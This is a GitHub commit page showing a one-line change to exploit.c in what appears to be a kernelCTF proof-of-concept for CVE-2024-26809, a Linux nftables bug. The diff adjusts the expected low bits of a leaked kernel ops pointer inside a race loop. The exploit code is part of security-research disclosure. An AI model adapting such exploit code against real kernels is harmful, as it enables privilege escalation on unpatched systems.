Skip to content

Commit af56692

Browse files
committed
Solve comments
1 parent 61596f8 commit af56692

File tree

2 files changed

+1
-1
lines changed
  • pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34

2 files changed

+1
-1
lines changed
Binary file not shown.

pocs/linux/kernelctf/CVE-2024-26809_lts_cos/exploit/cos-105-17412.294.34/exploit.c

+1-1
Original file line numberDiff line numberDiff line change
@@ -256,7 +256,7 @@ void exploit(struct nl_sock *socket){
256256
nl_recvmsgs_default(socket2);
257257
nl_recvmsgs_default(socket2);
258258
printf("Get ops : %llx\n",*(uint64_t *)(table_udata+0x28));//0x28 = offset(elem, expr[0]->ops), the elem is created by function nft_set_elem_init
259-
if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0x2e0){
259+
if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0xF20){
260260
break;
261261
}
262262
sleep(0.1);//Waiting the function nf_tables_commit.

0 commit comments

Comments
 (0)